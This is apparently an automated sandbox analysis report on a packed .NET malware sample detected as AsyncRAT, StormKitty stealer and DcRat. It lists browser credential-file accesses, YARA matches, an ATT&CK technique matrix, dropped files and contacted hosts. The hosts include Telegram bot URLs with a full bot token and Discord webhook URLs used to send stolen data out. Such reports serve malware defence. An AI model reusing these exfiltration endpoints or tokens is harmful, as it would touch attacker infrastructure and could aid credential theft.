Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png	Jump to behavior

Source: Yara match	File source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Remote Access Functionality

Yara detected BrowserPasswordDump

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Yara detected DcRat

Source: Yara match	File source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	131 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	31 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	3 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	21 Input Capture	244 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	231 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	21 Input Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	31 Scheduled Task/Job	31 Scheduled Task/Job	12 Process Injection	13 Software Packing	NTDS	551 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	1 Registry Run Keys / Startup Folder	31 Scheduled Task/Job	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 PowerShell	RC Scripts	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	4 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Bypass User Account Control	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	261 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRAT
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	82%	Virustotal		Browse
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	100%	Avira	TR/Dropper.Gen
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\Infected.exe	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\Client.exe	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\WinDefend.exe	100%	Avira	TR/Spy.Agent.qbvjl
C:\Users\user\AppData\Local\Temp\Infected.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Client.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\WinDefend.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Client.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRAT
C:\Users\user\AppData\Local\Temp\Infected.exe	76%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRAT
C:\Users\user\AppData\Local\Temp\WinDefend.exe	74%	ReversingLabs	Win32.Trojan.SpywareX
C:\Users\user\AppData\Roaming\Loaader.exe	76%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRAT
C:\Users\user\AppData\Roaming\Loader.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRAT

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
ip-api.com	0%	Virustotal	Browse
api.mylnikov.org	3%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
api64.ipify.org	0%	Virustotal	Browse
windowsupdatebg.s.llnwi.net	0%	Virustotal	Browse
icanhazip.com	0%	Virustotal	Browse
81.189.14.0.in-addr.arpa	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://crl.microsoft	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://icanhazip.com/	0%	URL Reputation	safe
https://api64.ipify.org3	0%	Avira URL Cloud	safe
https://api64.ipify.org/	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://ip-api.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDoc	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
http://crl.micro	0%	URL Reputation	safe
https://www.newtonsoft.com/jsonschema	0%	URL Reputation	safe
https://api.mylnikPX	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
http://www.codeplex.com/DotNetZip	0%	URL Reputation	safe
https://api.telegram.orgD	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage	0%	Avira URL Cloud	safe
https://www.nuget.org/packages/Newtonsoft.Json.Bson	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://ip-api.com/line/?fields=hosting	0%	URL Reputation	safe
https://github.com/LimerBoy/StormKitty	0%	Avira URL Cloud	safe
https://api.telegram.org/bott-	0%	Avira URL Cloud	safe
https://api.mylnikov.org	0%	Avira URL Cloud	safe
http://api.telegram.orgd	0%	Avira URL Cloud	safe
http://icanhazip.com	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocumentT	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendM	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessageT	0%	Avira URL Cloud	safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	0%	Avira URL Cloud	safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://api64.ipify.org/t	0%	Avira URL Cloud	safe
http://api.telegram.org0	0%	Avira URL Cloud	safe
https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn	0%	Avira URL Cloud	safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&	0%	Avira URL Cloud	safe
https://api64.ipify.org	0%	Avira URL Cloud	safe
https://api.mylnikov.org/geolocation/wifi?v=1.p	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument	0%	Avira URL Cloud	safe
https://api.telegram.orgn	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa	0%	Avira URL Cloud	safe
http://api.telegram.org	0%	Avira URL Cloud	safe
https://urn.to/r/sds_see	0%	Avira URL Cloud	safe
http://api.mylnikov.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
api.mylnikov.org	104.21.44.66	true	false	3%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
api64.ipify.org	64.185.227.155	true	false	0%, Virustotal, Browse	unknown
windowsupdatebg.s.llnwi.net	87.248.204.0	true	false	0%, Virustotal, Browse	unknown
icanhazip.com	104.16.185.241	true	false	0%, Virustotal, Browse	unknown
81.189.14.0.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api64.ipify.org/	false	Avira URL Cloud: safe	unknown
http://icanhazip.com/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage	false	Avira URL Cloud: safe	unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument	false	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	false	Avira URL Cloud: safe	unknown
https://api64.ipify.org3	WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	WinDefend.exe, 00000004.00000002.3288846438.0000000003522000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsoft	powershell.exe, 00000030.00000002.2300634583.0000013E8BBD4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDoc	WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003549000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000030.00000002.3074256391.0000013EA5BE0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.mylnikPX	Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD	WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003496000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000320E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	false	URL Reputation: safe	unknown
https://github.com/LimerBoy/StormKitty	Loader.exe, 00000014.00000002.2527964251.00000000029B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000019.00000002.2776917070.0000015CD05B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2776917070.0000015CD06F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19F09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19DC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DB9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
